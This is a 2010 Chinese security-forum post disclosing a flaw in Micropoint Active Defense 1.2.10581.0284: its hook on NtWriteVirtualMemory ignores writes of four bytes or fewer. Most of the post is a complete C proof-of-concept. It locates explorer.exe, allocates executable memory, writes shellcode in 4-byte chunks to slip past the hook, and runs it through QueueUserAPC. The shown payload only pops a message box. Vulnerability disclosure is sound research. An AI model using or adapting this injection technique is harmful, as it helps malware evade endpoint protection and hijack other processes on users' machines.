微点主动防御1.2.10581.0284绕过安全限制漏洞

标题：微点主动防御1.2.10581.0284绕过安全限制漏洞
作者：skypismire
时间：2010-06-04 18:00:21
链接：http://bbs.pediy.com/showthread.php?t=114532

漏洞涉及产品:微点主动防御1.2.10581.0284版本，其他版本尚未关注。

漏洞影响：通过此漏洞可以让攻击者绕过微点对NtWriteVirtualMemory函数的监控，从而能写任意进程的ring3内存空间，为DLL注入等恶意行为铺路。

漏洞详细原理：微点主动防御软件为了有效防止恶意进程写其他进程的内存空间，inlinehook了系统函数NtWriteVirtualMemory。但在处理NtWriteVirtualMemory的第四个参数BufferSize时，未对BufferSize<=4的写入情况进行控制，导致此情景发生。

利用程序代码如下：

操作系统：win7，winXP

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#define   _WIN32_WINNT   0x0400
#define NO_WIN32_LEAN_AND_MEAN

typedef HANDLE (_stdcall *OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId);

int main ()
{
int i;
BOOL bFlag;
BYTE * lpBuf;

THREADENTRY32 th32;
PROCESSENTRY32   procentry;
HANDLE hProcess, hSnapShot, hThread, hThreadSnap;
DWORD dwSize, dwWritten, dwProcessID, lpMessageBox;

HMODULE hDll;
OPENTHREAD lpfnOpenThread;

BYTE shellcode[] = "\x8b\xf6\x55\x8b\xec\x6a\x00\x6a\x00\x6a\x00\x6a\x00"
   "\xE8"
   "\x71\xea\xba\x75"
   "\x5d\xC2\x04\x00\x90\x90";
dwSize = 4;

lpMessageBox = GetProcAddress(LoadLibrary("User32.dll"), "MessageBoxA");
lpfnOpenThread = (OPENTHREAD)GetProcAddress(LoadLibrary("kernel32.dll"), "OpenThread");

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
procentry.dwSize = sizeof(PROCESSENTRY32);
bFlag= Process32First(hSnapShot, &procentry);
while(bFlag)
{
   if(stricmp(procentry.szExeFile, "explorer.exe")==0)
   {
    dwProcessID = procentry.th32ProcessID;
    break;
   }
   bFlag=Process32Next(hSnapShot,&procentry);
}

printf("explore.exe pid:%d\n", dwProcessID);

    hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID );
    lpBuf = VirtualAllocEx( hProcess, NULL, 24, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    if ( NULL == lpBuf )
    {
        CloseHandle( hProcess );
        return FALSE;
    }

printf ("VirtualAllocEx : %x\n", lpBuf);

*(signed long *)(shellcode + 14) = lpMessageBox - (signed long)lpBuf - 18;

for (i = 0; i < 6; i++)
{
   if( WriteProcessMemory( hProcess, lpBuf + i * 4, shellcode + i * 4, dwSize, &dwWritten ) )
   {
    if ( dwWritten != dwSize )
    {
     VirtualFreeEx( hProcess, lpBuf, 24, MEM_DECOMMIT );
     CloseHandle( hProcess );
     printf ("WriteProcessMemory Error!\n");
     return FALSE;
    }
   }
}

hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwProcessID);
if (hThreadSnap == INVALID_HANDLE_VALUE)
{
   CloseHandle( hProcess );
   return FALSE;
}
th32.dwSize = sizeof(THREADENTRY32);
if (!Thread32First(hThreadSnap, &th32))
{
   CloseHandle(hThreadSnap);
   CloseHandle(hProcess);
   return FALSE;
}
do
{
   if (th32.th32OwnerProcessID == dwProcessID)
   {
    printf("ThreadID: %ld\n", th32.th32ThreadID); //显示找到的线程的ID
    hThread = lpfnOpenThread(THREAD_ALL_ACCESS, FALSE, th32.th32ThreadID);

    if (!QueueUserAPC(lpBuf, hThread, NULL))
    {
     printf ("QueueUserApc error %x\n", GetLastError());
    }
   }
}while(Thread32Next(hThreadSnap, &th32));

CloseHandle(hThreadSnap);
    CloseHandle( hProcess );
    return TRUE;
}